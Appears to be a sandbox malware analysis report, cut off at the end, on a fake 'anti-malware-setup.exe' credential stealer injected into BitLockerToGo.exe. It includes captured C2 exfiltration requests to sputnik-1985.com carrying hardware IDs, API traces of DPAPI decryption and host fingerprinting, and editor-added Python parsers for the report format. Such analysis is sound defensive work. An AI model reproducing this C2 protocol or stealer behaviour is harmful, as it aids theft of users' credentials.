31 5a 4e 39 31 5a 32 5a 57 0d 0a 43
Data Ascii: --G1ZN91Z2ZWContent-Disposition: form-data; name="hwid"2C1B840C4ED5F58F4EC0E979F11769B5--G1ZN91Z2ZWContent-Disposition: form-data; name="pid"1--G1ZN91Z2ZWContent-Disposition: form-data; name="lid"HpOoIh--bd4e81951306--G1ZN91Z2ZWC
2025-01-10 10:34:39 UTC | 1122 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 10:34:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=0kvbff9l9d9icjtb1kmrq3cvd3; expires=Tue, 06 May 2025 04:21:18 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BVHwkuMVkvQqkkHsofD4RDxw1649MdoxZyci06JjYGilVclRODSDmHHRD8AIIe6f1AbpdXEzCw1%2Bb6dBj8H%2F8PwAIe7gl5WNiWI91QPTlC2saf6waN%2F86DfcXfkricwrLWVP"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffc040adc6142e9-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1731&min_rtt=1725&rtt_var=659&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1988&delivery_rate=1645997&cwnd=240&unsent_bytes=0&cid=c8dcacb07848ce4c&ts=583&x=0"
2025-01-10 10:34:39 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-01-10 10:34:39 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 62024 | 104.21.48.1 | 443 | 6204 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-10 10:34:40 UTC | 265 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 121
Host: sputnik-1985.com
2025-01-10 10:34:40 UTC | 121 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 62 64 34 65 38 31 39 35 31 33 30 36 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 32 43 31 42 38 34 30 43 34 45 44 35 46 35 38 46 34 45 43 30 45 39 37 39 46 31 31 37 36 39 42 35
Data Ascii: act=get_message&ver=4.0&lid=HpOoIh--bd4e81951306&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=2C1B840C4ED5F58F4EC0E979F11769B5
2025-01-10 10:34:40 UTC | 1118 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 10:34:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=olnv1v9gv3n073la2o7pk878sp; expires=Tue, 06 May 2025 04:21:19 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1e0HnSKKDaaoCCtAlggecpoRLccJKJ6lUyMmdCPMjV32Pzlwb%2FJP1o2vivR3FkqXXDFC4QQuPhdYWAYxUoS40QvhPMPpYhRvmBzjfLQ2wl8uzwQsuymcDsB9KSyj8iOIHXlW"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffc04127858c461-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1628&min_rtt=1622&rtt_var=620&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1022&delivery_rate=1746411&cwnd=228&unsent_bytes=0&cid=1ed75eb1318c8df3&ts=468&x=0"
2025-01-10 10:34:40 UTC | 54 | IN | Data Raw: 33 30 0d 0a 52 4a 72 63 70 4f 56 76 53 4d 6f 4f 2f 41 6a 47 70 2b 73 68 7a 79 32 69 68 74 32 7a 4e 30 66 6a 38 79 4f 73 56 6e 73 43 44 6f 73 66 78 77 3d 3d 0d 0a
Data Ascii: 30RJrcpOVvSMoO/AjGp+shzy2iht2zN0fj8yOsVnsCDosfxw==
2025-01-10 10:34:40 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Target ID: 0
Start time: 05:34:00
Start date: 10/01/2025
Path: C:\Users\user\Desktop\anti-malware-setup.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\anti-malware-setup.exe"
Imagebase: 0xcd0000
File size: 4'063'744 bytes
MD5 hash: FEDB69AF5DE74D46366AD0570E77D9AC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.2322019566.000000000213A000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
Reputation: low
Has exited: true

Target ID: 3
Start time: 05:34:23
Start date: 10/01/2025
Path: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Imagebase: 0xb00000
File size: 231'736 bytes
MD5 hash: A64BEAB5D4516BECA4C40B25DC0C1CD8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2411433910.0000000003497000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: moderate
Has exited: true

Memory Dump Source
• Source File: 00000000.00000002.2318498130.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_cd0000_anti-malware-setup.jbxd
Similarity
• Opcode ID: c8bac5558e55969c32dc51b64a7c4527bb7c2bbf13c3dd7484c4191df8abf1c4
• Instruction ID: 23a9a6e37cf2b1e0acf6f13e1859e122e8c202bbe6249b7f10329da4b6c34be3
• Opcode Fuzzy Hash: c8bac5558e55969c32dc51b64a7c4527bb7c2bbf13c3dd7484c4191df8abf1c4
• Instruction Fuzzy Hash: A351E0B46083058FD314DF28D1A476ABBF0FF89758F10896CE5988B392D77A9945CF42

Execution Graph

Execution Coverage: 8.7%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 67.8%
Total number of Nodes: 286
Total number of Limit Nodes: 18

Control-flow Graph

APIs
• CoCreateInstance.OLE32(0044068C,00000000,00000001,0044067C), ref: 00436E1D
• SysAllocString.OLEAUT32(B200B204), ref: 00436EAE
• CoSetProxyBlanket.COMBASE(BD24272E,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00436EF4
• SysAllocString.OLEAUT32(88598850), ref: 00436FA0
• SysAllocString.OLEAUT32(88598850), ref: 0043704E
• VariantInit.OLEAUT32(0FCC0FD7), ref: 004370BD
Strings
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocString$BlanketCreateInitInstanceProxyVariant
                                                                                                                                                                                                              • String ID: C$LLaL$Z`$\$k_$}b
                                                                                                                                                                                                              • API String ID: 65563702-2615794114
                                                                                                                                                                                                              • Opcode ID: ad29833ed1338fee8da95c9203b6fd2dc6c77385f67a1108a53f6f6df10e7fbe
                                                                                                                                                                                                              • Instruction ID: be7bbc96d51e0d9d06873dcc487c05ed3c248026cdc4e50e5904f424c4761214
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ad29833ed1338fee8da95c9203b6fd2dc6c77385f67a1108a53f6f6df10e7fbe
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D2233B2A083119BD724CF68C84176BBBE5EFD9300F15892DE9D59B390D778E805CB86

Control-flow Graph
• Rendered as an interactive graph in the original; summary of the dumped node data: entry 0x40d5fd, basic blocks 0x40d5fd-0x40d9e8.
• Calls in block order: call 4095f0, CoUninitialize (40d5fd-40d61f) -> call 40b700 (40d9aa-40d9c0). The remaining blocks (40d620-40d638, 40d6a0-40d705, 40d720-40d729, 40d740-40d749, 40d760-40d769, 40d780-40d789, 40d7a0-40d7a9, 40d7c0-40d7cd, 40d8a0-40d95c, 40d990-40d9a8) are short self-looping blocks with no calls.
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: Uninitialize
• String ID: !=s=$"=6=$#=<=$$='=$&=O=$)=k=$,="=$1=g=$3=2=$6= =$8=1=$9=+=$<=)=$q=l=$}=p=
• API String ID: 3861434553-2084406169
• Opcode ID: e10c166e449cadfe5e427b0f141e011440bcba76ac02f030b5a7a41c0d128f99
• Instruction ID: 1d13ac201350cec93a1d4c9f6dabf069617c0155b62c46b23090b54674f08de1
• Opcode Fuzzy Hash: e10c166e449cadfe5e427b0f141e011440bcba76ac02f030b5a7a41c0d128f99
• Instruction Fuzzy Hash: 90B105B4A007418FD728CF69D990A22BBF1FF9A30071985ADC4D68F7A2D739E805CB55

Control-flow Graph
• Rendered as an interactive graph in the original; summary of the dumped node data: entry 0x4165e4, basic blocks in two regions, 0x4165e4-0x41690f and 0x418032-0x41861d.
• Calls in block order: call 408030 (416640-41665a) -> call 41c460 * 2 (416684-4166d0) -> call 41c460 (4166d2-4166e9, 41671a-416734) -> call 43d1d0, CryptUnprotectData (416759-4167c1) -> call 408040 (4167d2-4167db) -> call 408030 (41680a-41684f) -> call 408b60 (4168d1-4168e7) -> call 408040 (4168ed-4168f3) -> call 43d1d0 (4168f6-41690f) -> call 4187b0 (418032-418045) -> call 401da0 (41822c-418250) -> call 401dd0 (4182b1-4182cf) -> call 41ae50 (418338-418398) -> call 408040 (4183b0-4183b9) -> call 401e00 (4183bd-4183cd) -> call 401e10 (4183d4-4183eb) -> call 408030, call 40a7c0 (418467-418493) -> call 408030 (41849e-4184bb) -> call 43e920 (418511-41851f) -> call 41ae50 (418576-4185d3) -> call 408040 (4185dc-4185e9) -> call 401f70 (41860e-41861d).
• Note: this record carries no APIs list, but the graph reaches CryptUnprotectData (the DPAPI decryption API) through the 43d1d0 wrapper at 416759-4167c1; the same wrapper precedes GetVolumeInformationW in the 436c90 function above. That 43d1d0 resolves imports at runtime is an inference from the two graphs, not a recorded call.
Strings
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: "A5l$7~,h$:v;h$;h2o$<n/~$_$q@0s
• API String ID: 0-3780068648
• Opcode ID: d6c6cc26523875e2cba40d58e468bd8b0425b41d77fe6d7c20336838abd28b8a
• Instruction ID: 8e10c3f90e9eb06ccae32fa6bede3b07bbb00d148fa4935470ab29e0d6d4c69c
• Opcode Fuzzy Hash: d6c6cc26523875e2cba40d58e468bd8b0425b41d77fe6d7c20336838abd28b8a
• Instruction Fuzzy Hash: 3A1226B29083019FC7249F24C8517ABB7E1EFD5314F15892EE4D9873A1EB38D981CB56

Control-flow Graph
• Rendered as an interactive graph in the original; summary of the dumped node data: entry 0x4227f6, basic blocks 0x4227f6-0x422cf7.
• Calls in block order: call 408030 (422808-422826) -> call 408040 (422833-422839) -> call 408030 (422873-4228af) -> call 43e920 (422981-42298c) -> call 4206d0 (422a8a-422a9f) -> call 4206d0 (422b5a-422b6e) -> call 408040 (422ce8-422cf7). The 4206d0 callee is the last function record in this section.
Strings
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: )!)$#)#)$&O7$().)$))0)$+)()$-).)$3)")$=).)$>)")$v.B
• API String ID: 0-740882422
• Opcode ID: 174ddcb0c1073a5b924e8725b956bb6790ea0586233098e12abde3eac4c50e14
• Instruction ID: a5114850e952b8c59ef38c9257656ea7c20ff065b7e81d6989642306bb9eb3e9
• Opcode Fuzzy Hash: 174ddcb0c1073a5b924e8725b956bb6790ea0586233098e12abde3eac4c50e14
• Instruction Fuzzy Hash: 7281BCB49183109BD318DF5AE98122BBBF4FFE5304F545A2DF5D59B210D3B88902CB96

Control-flow Graph
• Rendered as an interactive graph in the original; summary of the dumped node data: entry 0x4085e0, basic blocks 0x4085e0-0x4088b0.
• Calls in block order: call 43b1c0 (4085e0-4085f1) -> call 434170 (4085f7-4085fe) -> GetCurrentProcessId, GetCurrentThreadId (408604-408628) -> SHGetSpecialFolderPathW, call 43a280 (40862e-4087e4) -> GetForegroundWindow (408826-408842) -> call 409b20 (408873-40888b) -> call 40c920 (40888d) -> call 40b6d0 (408892) -> call 408040 (4088a0-4088a6) -> call 43b7e0 (4088a9) -> ExitProcess (4088ae-4088b0). The entry block also branches directly to the ExitProcess block, and the 4085f7 block directly to the 408897 exit path.
APIs
• GetCurrentProcessId.KERNEL32 ref: 00408604
• GetCurrentThreadId.KERNEL32 ref: 0040860E
• SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408772
  • Part of subcall function 0043A280: RtlAllocateHeap.NTDLL(?,00000000,004087C1,?,004087C1,00001388), ref: 0043A290
• GetForegroundWindow.USER32 ref: 0040883A
• ExitProcess.KERNEL32 ref: 004088B0
• Note: the SHGetSpecialFolderPathW csidl argument 00000010 is CSIDL_DESKTOPDIRECTORY (the current user's Desktop folder) with fCreate = 00000000; the output buffer pointer was not captured (shown as ?).
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: CurrentProcess$AllocateExitFolderForegroundHeapPathSpecialThreadWindow
• String ID:
• API String ID: 3634766228-0
• Opcode ID: c79b31161eaab67f9f5e03b98ae6d72b444e092ca73f34092ca8b649c6f62c13
• Instruction ID: 086e3edace53a1d5c1471e98d3e2b182ad2e88e46c3d2487443f827601e80181
• Opcode Fuzzy Hash: c79b31161eaab67f9f5e03b98ae6d72b444e092ca73f34092ca8b649c6f62c13
• Instruction Fuzzy Hash: DA611A72A043044FD318EF799D5631BF6D6ABC9310F0AC53EB999EB391DE7898048789
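Worked example added by the editor, not part of the Joe Sandbox report and not code from the sample: a small parser for the "APIs" lines of these function records that decodes the arguments whose meaning the Win32 API definition fixes (the CoSetProxyBlanket authentication settings and CLSCTX flag of the 436c90 record, the CSIDL folder id of the 4085e0 record) and flags the WMI client pattern. The line format is inferred from the lines on this page, the constant values are those of the Windows SDK headers, and looks_like_wmi_init is this example's own heuristic, not a Joe Sandbox signature.

```python
"""Parse and annotate the "APIs" lines of Joe Sandbox function records.

Added example: line format inferred from the records on this page, constant
tables from the Windows SDK headers, looks_like_wmi_init() is our heuristic.
"""
import re
from dataclasses import dataclass
from functools import partial
from typing import Optional

# Constructed input: API lines copied from the 436c90 and 4085e0 records.
SAMPLE_API_LINES = """\
• CoCreateInstance.OLE32(0044068C,00000000,00000001,0044067C), ref: 00436E1D
• SysAllocString.OLEAUT32(B200B204), ref: 00436EAE
• CoSetProxyBlanket.COMBASE(BD24272E,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00436EF4
• SysAllocString.OLEAUT32(88598850), ref: 00436FA0
• VariantInit.OLEAUT32(0FCC0FD7), ref: 004370BD
• GetCurrentProcessId.KERNEL32 ref: 00408604
• SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408772
  • Part of subcall function 0043A280: RtlAllocateHeap.NTDLL(?,00000000,004087C1,?,004087C1,00001388), ref: 0043A290
• ExitProcess.KERNEL32 ref: 004088B0
"""

LINE_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"          # Api.MODULE
    r"(?:\((?P<args>[^)]*)\))?"                # optional (hex,hex,?,...)
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"  # call-site address
)


@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: tuple                       # ints; None where the tracer printed '?'
    ref: int                          # call-site address
    subcall_of: Optional[int] = None  # parent for "Part of subcall" lines


def parse_api_lines(text: str) -> list:
    """Return the ApiCall entries of one record, skipping headings."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = tuple(None if a.strip() == "?" else int(a, 16)
                     for a in raw.split(",")) if raw else ()
        sub = m.group("sub")
        calls.append(ApiCall(m.group("name"), m.group("module"), args,
                             int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls


# Values from the Windows SDK headers (rpcdce.h, objbase.h, shlobj.h).
RPC_C_AUTHN = {0: "RPC_C_AUTHN_NONE", 9: "RPC_C_AUTHN_GSS_NEGOTIATE", 10: "RPC_C_AUTHN_WINNT",
               16: "RPC_C_AUTHN_GSS_KERBEROS", 0xFFFFFFFF: "RPC_C_AUTHN_DEFAULT"}
RPC_C_AUTHZ = {0: "RPC_C_AUTHZ_NONE", 1: "RPC_C_AUTHZ_NAME", 2: "RPC_C_AUTHZ_DCE",
               0xFFFFFFFF: "RPC_C_AUTHZ_DEFAULT"}
RPC_C_AUTHN_LEVEL = {0: "RPC_C_AUTHN_LEVEL_DEFAULT", 1: "RPC_C_AUTHN_LEVEL_NONE",
                     2: "RPC_C_AUTHN_LEVEL_CONNECT", 3: "RPC_C_AUTHN_LEVEL_CALL",
                     4: "RPC_C_AUTHN_LEVEL_PKT", 5: "RPC_C_AUTHN_LEVEL_PKT_INTEGRITY",
                     6: "RPC_C_AUTHN_LEVEL_PKT_PRIVACY"}
RPC_C_IMP_LEVEL = {0: "RPC_C_IMP_LEVEL_DEFAULT", 1: "RPC_C_IMP_LEVEL_ANONYMOUS",
                   2: "RPC_C_IMP_LEVEL_IDENTIFY", 3: "RPC_C_IMP_LEVEL_IMPERSONATE",
                   4: "RPC_C_IMP_LEVEL_DELEGATE"}
EOAC = {0: "EOAC_NONE"}
CLSCTX = {0x1: "CLSCTX_INPROC_SERVER", 0x2: "CLSCTX_INPROC_HANDLER",
          0x4: "CLSCTX_LOCAL_SERVER", 0x10: "CLSCTX_REMOTE_SERVER"}
CSIDL = {0x00: "CSIDL_DESKTOP", 0x05: "CSIDL_PERSONAL", 0x07: "CSIDL_STARTUP",
         0x10: "CSIDL_DESKTOPDIRECTORY", 0x1A: "CSIDL_APPDATA", 0x1C: "CSIDL_LOCAL_APPDATA",
         0x24: "CSIDL_WINDOWS", 0x25: "CSIDL_SYSTEM", 0x26: "CSIDL_PROGRAM_FILES",
         0x28: "CSIDL_PROFILE"}


def _enum(table, value):
    return table.get(value, f"0x{value:X}")


def _flags(table, value):
    names = [n for bit, n in table.items() if value & bit]
    known = sum(bit for bit in table if value & bit)
    if value & ~known:
        names.append(f"0x{value & ~known:X}")
    return "|".join(names) or "0"


def _csidl(value):
    # CSIDL_FLAG_CREATE (0x8000) may be OR-ed into the folder id.
    name = _enum(CSIDL, value & 0x7FFF)
    return name + "|CSIDL_FLAG_CREATE" if value & 0x8000 else name


# API name -> {argument index: (parameter name, decoder)}
ARG_DECODERS = {
    "CoCreateInstance": {2: ("dwClsContext", partial(_flags, CLSCTX))},
    "CoSetProxyBlanket": {1: ("dwAuthnSvc", partial(_enum, RPC_C_AUTHN)),
                          2: ("dwAuthzSvc", partial(_enum, RPC_C_AUTHZ)),
                          4: ("dwAuthnLevel", partial(_enum, RPC_C_AUTHN_LEVEL)),
                          5: ("dwImpLevel", partial(_enum, RPC_C_IMP_LEVEL)),
                          7: ("dwCapabilities", partial(_enum, EOAC))},
    "SHGetSpecialFolderPathW": {2: ("csidl", _csidl)},
}


def annotate(call: ApiCall) -> dict:
    """Symbolic names for the arguments whose meaning the API definition fixes."""
    out = {}
    for idx, (label, decode) in ARG_DECODERS.get(call.name, {}).items():
        if idx < len(call.args) and call.args[idx] is not None:
            out[label] = decode(call.args[idx])
    return out


def looks_like_wmi_init(calls) -> bool:
    """Heuristic of this example: in-process CoCreateInstance, a BSTR allocation,
    then CoSetProxyBlanket with the NTLM / call-level / impersonate settings of the
    documented WMI client sequence."""
    created = bstr = False
    for c in calls:
        a = annotate(c)
        if c.name == "CoCreateInstance" and "CLSCTX_INPROC_SERVER" in a.get("dwClsContext", ""):
            created = True
        elif c.name == "SysAllocString" and created:
            bstr = True
        elif (c.name == "CoSetProxyBlanket" and created and bstr
              and a.get("dwAuthnSvc") == "RPC_C_AUTHN_WINNT"
              and a.get("dwAuthnLevel") == "RPC_C_AUTHN_LEVEL_CALL"
              and a.get("dwImpLevel") == "RPC_C_IMP_LEVEL_IMPERSONATE"):
            return True
    return False


def report(text: str) -> list:
    """One annotated line per recorded call, in record order."""
    lines = []
    for c in parse_api_lines(text):
        extra = ", ".join(f"{k}={v}" for k, v in annotate(c).items())
        prefix = f"  [sub of {c.subcall_of:08X}] " if c.subcall_of else "  "
        lines.append(f"{prefix}{c.ref:08X} {c.module}!{c.name}" + (f"  {extra}" if extra else ""))
    return lines


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_API_LINES)))
    print("WMI-style COM setup:", looks_like_wmi_init(parse_api_lines(SAMPLE_API_LINES)))
```

The script runs offline on the embedded lines; paste any record's APIs list into SAMPLE_API_LINES to decode it. Only arguments the API contract fixes are decoded: pointer values such as the CLSID/IID addresses or the BSTR arguments are left as raw hex, since their meaning depends on memory the record does not include.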

Control-flow Graph
• Rendered as an interactive graph in the original; summary of the dumped node data: entry 0x4206d0, basic blocks 0x4206d0-0x420ec4.
• Calls in block order: call 43e780 (4206d0-420715) -> call 413d90, call 43a280 (42071b-420796) -> call 43b8a0 (420843-4208b3) -> call 420ed0 (42097a-420998) -> call 420ed0 (420a02-420a21) -> call 408030, call 413a20, call 408040 (420a51-420ad2) -> call 43a280 (420ae5-420af6) -> call 43b8a0 (420c4f-420cc9) -> call 43a2a0 (420d67-420d78) -> call 43a2a0 (420db8-420ded) -> call 43b8a0 (420e79-420ea2). The entry block also branches directly to the 420eb4-420ec4 exit block.
Strings
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: AllocateHeapInitializeThunk
• String ID: !@$,$?~$j~
• API String ID: 383220839-3420566057
                                                                                                                                                                                                              • Opcode ID: eb696b9a81ff76e8f50d2b965ee7f65dd9cb4f791b988b329618bb3c974c226e
                                                                                                                                                                                                              • Instruction ID: bb1f7b71dadf4569e958f358140e1f51ea4c1085977d452122ebedaab43f38d1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: eb696b9a81ff76e8f50d2b965ee7f65dd9cb4f791b988b329618bb3c974c226e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8222CF7161C3608BC3289F68D48136FBBE2AFC5310F94892EE5D587392E7799845CB4B

Control-flow Graph

control_flow_graph 469 42af9f-42afcf 470 42afd0-42b028 469->470 470->470 471 42b02a-42b034 470->471 472 42b036-42b03f 471->472 473 42b04b-42b08c GetComputerNameExA 471->473 474 42b040-42b049 472->474 474->473 474->474
APIs
• GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042B06D
Strings
Memory Dump Source
• Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: ComputerName
• String ID: (5Xi
• API String ID: 3545744682-544108822
• Opcode ID: 4e2c1c84ac1f0c9119c2f895de2a90b27cd8b90ac0da9fce6f056a76107ce9ac
• Instruction ID: ccaf43140a0f5cbc81473a73733068c6ded1121991b384f9f9fe1d119be33522
• Opcode Fuzzy Hash: 4e2c1c84ac1f0c9119c2f895de2a90b27cd8b90ac0da9fce6f056a76107ce9ac
• Instruction Fuzzy Hash: 3B11367561D6914ADB248F35C8583BBB7E5EBD6305F08452D80CAD7285CF784005C706
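The control_flow_graph lines in these records are Joe Sandbox's text form of the rendered graph: each `<id> <start>-<end>` pair is a basic block in the dumped image (base 0x400000 in the BitLockerToGo process, per the Memory Dump Source lines), `call <addr>` names a subroutine called from that block, a bare import name marks a resolved API call, and `a->b` is an edge. The APIs lines give the call site and the argument values the sandbox captured, with `?` where it captured none. The Python below is an added example for reading these records; it is not code from the report or from the analysed sample. It parses both formats so that a record can be queried rather than read by eye: which blocks branch back to themselves (tight loops, which is the shape the inline string-decoding the report flags usually takes, though a self-loop alone does not prove it), which subroutines a function calls (for cross-referencing records; for instance the function at 4206d0 above calls 43b8a0 from three blocks, and the LdrInitializeThunk reference 0043B8CE in a later record lies 0x2E bytes past 43b8a0), and what the captured arguments mean. The inputs are lines copied from this section; the only table assumed from outside the page is the documented COMPUTER_NAME_FORMAT enum of GetComputerNameEx, under which the first argument 00000005 is ComputerNamePhysicalDnsHostname and the captured size 00000100 is a 256-character buffer.

```python
# Added example: parse Joe Sandbox CFG dumps and API reference lines.
# Not code from the report or from the sample it analyses.
import re
from dataclasses import dataclass, field

# Record lines copied from this section of the report.
CFG_GETCOMPUTERNAME = (
    "control_flow_graph 469 42af9f-42afcf 470 42afd0-42b028 469->470 470->470 "
    "471 42b02a-42b034 470->471 472 42b036-42b03f 471->472 473 42b04b-42b08c "
    "GetComputerNameExA 471->473 474 42b040-42b049 472->474 474->473 474->474"
)
CFG_DECODE_LOOP = (
    "control_flow_graph 506 409b20-409b42 507 409b50-409bd0 506->507 507->507 "
    "508 409bd6-409c0f 507->508 509 409c10-409c29 508->509 509->509 "
    "510 409c2b-409c32 509->510 511 409c37-409c71 call 43b180 510->511"
)
APIREF_COMPUTERNAME = "GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042B06D"
APIREF_LDR = ("LdrInitializeThunk.NTDLL(0043E8FA,005C003F,00000018,?,?,00000018,?,?,?), "
              "ref: 0043B8CE")

# Documented COMPUTER_NAME_FORMAT enum of GetComputerNameEx (list index = enum value).
COMPUTER_NAME_FORMAT = [
    "ComputerNameNetBIOS", "ComputerNameDnsHostname", "ComputerNameDnsDomain",
    "ComputerNameDnsFullyQualified", "ComputerNamePhysicalNetBIOS",
    "ComputerNamePhysicalDnsHostname", "ComputerNamePhysicalDnsDomain",
    "ComputerNamePhysicalDnsFullyQualified",
]


@dataclass
class Block:
    nid: int
    start: int                                  # first address of the basic block
    end: int                                    # last listed address (== start for one-address blocks)
    calls: list = field(default_factory=list)   # subroutine addresses called from this block
    apis: list = field(default_factory=list)    # resolved imports called from this block


_RANGE = re.compile(r"[0-9a-f]+(?:-[0-9a-f]+)?")
_EDGE = re.compile(r"(\d+)->(\d+)")
_APIREF = re.compile(r"(\w+)\.(\w+)\(([^)]*)\), ref: ([0-9A-Fa-f]+)")


def parse_cfg(line):
    """Return ({block id: Block}, [(src, dst), ...]) for one control_flow_graph line."""
    toks = line.split()
    blocks, edges, cur, i = {}, [], None, 0
    while i < len(toks):
        t = toks[i]
        if (m := _EDGE.fullmatch(t)):
            edges.append((int(m[1]), int(m[2])))
        elif t == "call" and cur is not None and i + 1 < len(toks):
            cur.calls.append(int(toks[i + 1], 16))
            i += 1                                  # the callee address token is consumed too
        elif t.isdigit() and i + 1 < len(toks) and _RANGE.fullmatch(toks[i + 1]):
            lo, _, hi = toks[i + 1].partition("-")   # "<id> <start>-<end>" or "<id> <addr>"
            cur = Block(int(t), int(lo, 16), int(hi or lo, 16))
            blocks[cur.nid] = cur
            i += 1
        elif cur is not None and t != "control_flow_graph" and not re.fullmatch(r"[0-9a-f]+", t):
            cur.apis.append(t)                      # bare import name, e.g. GetComputerNameExA
        i += 1
    return blocks, edges


def self_loops(blocks, edges):
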